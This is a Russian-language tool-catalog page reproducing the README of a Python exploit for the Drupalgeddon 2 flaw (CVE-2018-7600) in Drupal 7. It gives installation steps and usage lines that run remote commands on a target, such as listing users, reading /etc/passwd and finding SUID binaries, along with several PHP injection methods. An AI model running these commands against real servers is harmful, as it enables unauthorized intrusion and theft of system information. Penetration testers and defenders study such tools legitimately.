Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Drupalgeddon2-CVE-2018-7600 — Python-эксплойт для CVE-2018-7600 (Drupalgeddon 2), обеспечивающий удалённое выполнение кода на Drupal 7 с несколькими методами инъекций и предопределёнными командами для Linux и Windows. | Kitploit
Инструменты/GitHubGitHub/bixipro/drupalgeddon2-cve-2018-7600
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHubbixipro/drupalgeddon2-cve-2018-7600

Drupalgeddon2-CVE-2018-7600

Python-эксплойт для CVE-2018-7600 (Drupalgeddon 2), обеспечивающий удалённое выполнение кода на Drupal 7 с несколькими методами инъекций и предопределёнными командами для Linux и Windows.

Репозиторий
57 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔥 Drupalgeddon 2 Exploit — bixi.py

📖 Описание

bixi.py — эксплойт для уязвимости CVE‑2018‑7600 (Drupalgeddon 2), затрагивающей Drupal 7. Позволяет удалённо выполнять команды (RCE) на уязвимых серверах Drupal через интуитивно понятный интерфейс с предопределёнными командами.


⚠️ DISCLAIMER / ПРАВОВОЕ ПРЕДУПРЕЖДЕНИЕ

ДАННОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДНАЗНАЧЕНО ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И ИССЛЕДОВАТЕЛЬСКИХ ЦЕЛЕЙ В КОНТРОЛИРУЕМЫХ СРЕДАХ.

  • Используйте только в системах, которыми владеете или на тестирование которых имеете письменное разрешение
  • Несанкционированное использование НЕЗАКОННО и может повлечь уголовную ответственность
  • Автор не несёт ответственности за неправомерное использование данного инструмента
  • Всегда соблюдайте местные и международные законы о кибербезопасности

"С большой силой приходит большая ответственность"


📋 Возможности

  • ✅ Автоматическая эксплуатация CVE‑2018‑7600
  • ✅ Предопределённые команды для Linux и Windows
  • ✅ Несколько методов инъекции (system, passthru, exec, shell_exec)
  • ✅ Интуитивно понятный интерфейс со встроенной справкой
  • ✅ Надёжная обработка ошибок и таймаутов
  • ✅ Форматированный и легко читаемый вывод

🚀 Быстрая установка

1. Клонирование репозитория

git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
cd Drupalgeddon2-CVE-2018-7600

2. Установка зависимостей

# Kali / Debian / Ubuntu
sudo apt update
sudo apt install python3 python3-pip -y
pip3 install requests

# Другие дистрибутивы
pip3 install requests

3. Установка прав на выполнение

chmod +x bixi.py

🎯 Базовое использование

Просмотр полной справки

python3 bixi.py --help

Общий синтаксис

python3 bixi.py <URL> <КОМАНДА/КЛЮЧЕВОЕ_СЛОВО> [INJECTION_TYPE]

Практические примеры

# Проверка уязвимости
python3 bixi.py http://10.99.99.6/drupal/ test

# Определение операционной системы
python3 bixi.py http://10.99.99.6/drupal/ linux
python3 bixi.py http://10.99.99.6/drupal/ windows

# Перечисление пользователей
python3 bixi.py http://10.99.99.6/drupal/ users_linux
python3 bixi.py http://10.99.99.6/drupal/ net_user

# Информация о системе
python3 bixi.py http://10.99.99.6/drupal/ ifconfig
python3 bixi.py http://10.99.99.6/drupal/ ipconfig

# Пользовательские команды
python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"

📊 Предопределённые ключевые слова

🐧 Linux

КомандаОписание
linuxИнформация о системе
users_linuxСписок пользователей
idИнформация о пользователе/группе
lsСписок файлов
ifconfigСетевая информация
find_flagПоиск флагов

🪟 Windows

КомандаОписание
windowsИнформация о системе
net_userСписок пользователей
whoami_winДетальная информация
ipconfigСеть
netstat_winСоединения
dirСписок каталога

🔧 Пентестинг

КомандаОписание
sudoПроверка привилегий sudo
suidПоиск SUID-бинарников
net_localgroupЛокальные группы
drupal_configПоиск конфигураций
drupal_versionПолучение версии Drupal

🎨 Методы инъекции

# system (по умолчанию)
python3 bixi.py http://target/ "whoami" system

# passthru
python3 bixi.py http://target/ "whoami" passthru

# exec
python3 bixi.py http://target/ "whoami" exec

# shell_exec
python3 bixi.py http://target/ "whoami" shell_exec

🏗️ Структура проекта

drupalgeddon2-exploit/
│
├── bixi.py
├── README.md
├── requirements.txt
├── examples/
│   ├── linux_commands.txt
│   └── windows_commands.txt
└── screenshots/
    ├── help_screen.png
    └── exploit_success.png

🔧 Расширенная настройка

Прокси (опционально)

proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

Таймаут

Изменение значения по умолчанию (15 секунд):

timeout=15

Добавление новых команд

Отредактируйте словарь commands в get_command_for_keyword()


🐛 Решение проблем

Ошибка: No module named 'requests'

pip3 install requests

Ошибка: Connection refused

# Проверка связности
ping TARGET_IP

# Проверка пути к Drupal
curl http://TARGET_IP/drupal/
Скачать инструмент